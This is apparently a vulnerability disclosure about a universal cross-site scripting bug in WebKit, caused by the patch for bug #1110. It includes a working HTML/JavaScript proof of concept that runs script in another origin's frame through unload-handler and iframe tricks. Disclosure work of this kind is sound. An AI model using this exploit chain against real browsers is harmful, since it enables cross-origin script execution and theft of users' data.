WebKit Patch #1110 Universal Cross Site Scripting

The WebKit #1110 patch created a universal cross site scripting vulnerability.


MD5 | 8098c3fb457b2945a51eccf43fe835a4

 WebKit: UXSS: the patch of #1110 made another bug 




Here's the patch of #1110.
<a href="https://trac.webkit.org/changeset/212218/trunk/Source/WebCore/dom/ContainerNode.cpp" title="" class="" rel="nofollow">https://trac.webkit.org/changeset/212218/trunk/Source/WebCore/dom/ContainerNode.cpp</a>

void ContainerNode::parserRemoveChild(Node& oldChild)
{
disconnectSubframesIfNeeded(*this, DescendantsOnly); <<---- (a)
...
}

(a) was added for the fix. But in |disconnectSubframesIfNeeded|, which fires unload event handlers, |oldChild|'s parent may be replaced. As a result, subframes of |oldChild| will be not detached.

PoC:
<body>
<div>

<p>
<script>
d = document.querySelector('div');
p = document.querySelector('p');
p.parentElement.appendChild(document.createElement('iframe')).contentWindow.onunload = () => {
document.body.appendChild(p);
d.remove();

f = p.appendChild(document.createElement('iframe'));
f.onload = () => {
f.onload = null;

document.documentElement.innerHTML = '';

f.src = 'javascript:alert(location)';

let xml = `
<svg xmlns="<a href="http://www.w3.org/2000/svg" title="" class="" rel="nofollow">http://www.w3.org/2000/svg</a>">
<script>
document.documentElement.appendChild(document.createElementNS('<a href="http://www.w3.org/1999/xhtml" title="" class="" rel="nofollow">http://www.w3.org/1999/xhtml</a>', 'iframe')).contentWindow.onunload = () => {
document.documentElement.appendChild(parent.f.parentElement.parentElement.parentElement);
};
</sc` + `ript>
<element a="1" a="2" />
</svg>`;

let tmp = document.documentElement.appendChild(document.createElement('iframe'));
tmp.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));
};
f.src = '<a href="https://abc.xyz/';" title="" class="" rel="nofollow">https://abc.xyz/';</a>
};
</script>

</p>
</div>
</body>


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: lokihardt


Related Posts